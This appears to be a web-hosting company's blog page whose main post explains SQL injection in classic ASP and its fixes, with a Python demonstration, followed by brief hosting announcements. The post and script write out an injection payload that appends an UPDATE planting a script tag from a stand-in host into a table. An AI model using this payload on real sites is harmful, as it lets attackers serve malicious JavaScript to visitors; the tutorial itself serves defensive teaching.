Blog
"SQL Injection" has become an increasingly common way for attackers to compromise web sites, but what is SQL injection and what can web developers do to avoid it?
SQL injection means manipulating the values a web page receives (query string, form fields, cookies) so that they alter, or add to, the SQL queries the site's code builds from them.
There are many ways SQL injection can be abused, but today we are going to look at the technique most common at the moment: using it to insert a reference to a malicious JavaScript file into the site's own pages.
Take the following simple example using ASP:
testpage.asp

<%
szQuery = "Select * From myTable Where ID = " & Request("ID")
…
%>
Because Request("ID") is used without any filtering or checking, whatever an attacker puts into the ID parameter of the URL becomes part of the SQL text. With ADO against SQL Server the whole string is sent as one batch, so the attacker is not limited to changing the WHERE clause: they can append entire extra statements after a semicolon.
So if they host a script at, say, http://testdomain.local/bad.js, and myTable has a column called "Description" whose contents are displayed on the page, an attacker could request the following:
testpage.asp?ID=1;Update myTable set Description = '<script src="http://testdomain.local/bad.js"></script>' Where ID = 1

This runs the intended SELECT and then the injected UPDATE, which overwrites the Description of record ID = 1 with the script tag, so every visitor who views that record now loads the attacker's JavaScript. (In a real request the spaces and quotes would be URL-encoded; the server decodes them before Request("ID") sees them.)
THIS IS BAD
So how does one fix it?
The best approach is not to put request variables directly into SQL text in the first place. Classic ASP can do this through ADODB.Command with CreateParameter and Parameters.Append, though retrofitting it onto existing concatenated queries is not always an easy option.
In ASP.NET the problem is solved by using SqlCommand.Parameters to add each variable the query needs; the value is sent to the database as a typed parameter, never as part of the SQL string.
Then the SQL Query will look something like this:
Select * From myTable Where ID = @ID;
But if you need to quickly fix older ASP code, then filtering each request variable manually is a reasonable stop-gap.
(Though not completely foolproof.)
<%
' Double every single quote so the value cannot close the string literal it is placed in
' (this is the escaping step the text describes; the original listing omitted the Replace).
szID = Replace(Request("ID"), "'", "''")
szQuery = "Select * From myTable Where ID = '" & szID & "'"
%>

The Replace doubles every single quote in the value, so the attacker can no longer terminate the quoted literal in the query; a semicolon or any other SQL inside the quotes is then just characters being compared against ID.
Note that this only helps when the value is placed inside quotes as a string. An unquoted value cannot be protected by escaping quotes.
If the variable is a known type other than a string (say Integer) then cast it to that type before building the query, so that anything that is not a number never reaches the SQL:
<%
iID = CInt(Request("ID"))
szQuery = "Select * From myTable Where ID = " & iID
…
%>
In the above example, if an attacker puts anything other than a number into ID, CInt raises a type-mismatch runtime error and the query is never built or run. Two caveats: CInt is a 16-bit Integer, so legitimate IDs above 32767 will overflow (use CLng for those), and an unhandled runtime error sends the visitor a server error page, so wrap the conversion with On Error Resume Next and check Err.Number if you would rather return a friendly message.
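As an added example (not code from the original post), the following Python script walks the page's own payload through each of the four variants above: the unfiltered concatenation, the bound parameter, the quote-escaping fix, and the integer cast, and reports what the Description of record 1 looks like afterwards. SQLite stands in for SQL Server; because sqlite3's execute() refuses multi-statement strings, executescript() is used to emulate ADO sending the whole concatenated text to SQL Server as one batch. The table contents, the helper names and the regex-based integer check are assumptions made for the demonstration.

```python
import re
import sqlite3

# Constructed sample data standing in for the page's "myTable"; not from the original post.
SCHEMA = """
CREATE TABLE myTable (ID INTEGER PRIMARY KEY, Description TEXT);
INSERT INTO myTable VALUES (1, 'Welcome to our site');
INSERT INTO myTable VALUES (2, 'About us');
"""

# The request value from the page, as it arrives (URL-decoded) in Request("ID").
PAYLOAD = ('1;Update myTable set Description = '
           '\'<script src="http://testdomain.local/bad.js"></script>\' Where ID = 1')
BAD_JS = '<script src="http://testdomain.local/bad.js"></script>'


def fresh_db():
    """In-memory SQLite standing in for the site's SQL Server database (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def description_of(conn, row_id=1):
    """What the page would render for a record; used to see whether the UPDATE landed."""
    return conn.execute("SELECT Description FROM myTable WHERE ID = ?", (row_id,)).fetchone()[0]


def vulnerable_lookup(conn, request_id):
    """testpage.asp as written: the raw request value is concatenated into the SQL text.
    ADO on SQL Server sends the whole string as one batch, so the attacker's appended
    UPDATE runs too.  sqlite3.execute() refuses multi-statement strings, so
    executescript() emulates that batch behaviour here (assumption about the emulation)."""
    query = "Select * From myTable Where ID = " + request_id
    conn.executescript(query)
    return query


def parameterised_lookup(conn, request_id):
    """The ASP.NET fix (SqlCommand.Parameters / @ID on the page): the value is bound as a
    parameter, so whatever it contains is compared as data and never parsed as SQL."""
    return conn.execute("Select * From myTable Where ID = ?", (request_id,)).fetchall()


def escape_quoted(value):
    """The classic-ASP string fix: double every single quote so the value cannot close
    the '...' literal it is embedded in.  Only safe when the value sits inside quotes."""
    return value.replace("'", "''")


def escaped_lookup(conn, request_id):
    """Concatenation again, but the value is escaped and quoted, so the whole payload,
    semicolon and all, becomes one string literal inside a single SELECT."""
    query = "Select * From myTable Where ID = '" + escape_quoted(request_id) + "'"
    conn.executescript(query)
    return query


def parse_int_id(value):
    """The CInt() approach: accept only a plain integer; anything else is an error
    before any SQL is built.  Returns an int, so str() of it cannot carry SQL."""
    if not re.fullmatch(r"\s*-?\d+\s*", value):
        raise ValueError("ID must be an integer")
    return int(value)


def is_rejected_by_cast(request_id):
    """True when the integer check refuses the value, mirroring CInt() raising an error."""
    try:
        parse_int_id(request_id)
    except ValueError:
        return True
    return False


def run_all(request_id=PAYLOAD):
    """Run the attack payload through each variant on a fresh database and report
    what the Description of record 1 looks like afterwards."""
    outcome = {}
    conn = fresh_db()
    vulnerable_lookup(conn, request_id)
    outcome["vulnerable"] = description_of(conn)      # now carries the script tag
    conn = fresh_db()
    parameterised_lookup(conn, request_id)
    outcome["parameterised"] = description_of(conn)   # untouched: payload was data
    conn = fresh_db()
    escaped_lookup(conn, request_id)
    outcome["escaped"] = description_of(conn)         # untouched: payload stayed in quotes
    outcome["cast_rejects"] = is_rejected_by_cast(request_id)
    return outcome


if __name__ == "__main__":
    for name, value in run_all().items():
        print(f"{name:14} {value}")
```

Running the script shows the vulnerable variant's Description replaced by the script tag while the other three leave it alone; the parameterised lookup additionally returns no rows for the payload, because the database compares the entire string as a value rather than parsing it.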
So there you have it, SQL Injection is easy to avoid once you know how.
Just a quick post to say that IIS 7.0 is now available on all our Web Hosting plans.
Check out http://www.studiocoast.com.au/web-hosting.aspx for more information.
If you've wondered why there haven't been any posts to our blog in the last few weeks then wonder no more!
I have been busy at work on the latest version of our customer management system codenamed "blackbriar" (see our blog entry about "Alcatraz" for what the system is all about)
The two key features of this release are:
We'll be releasing an IIS7 based Web Hosting service to the public soon, but in the mean time power users may be more interested in our new Hyper-V VPS service which comes with Windows Server 2008 and IIS7 as standard.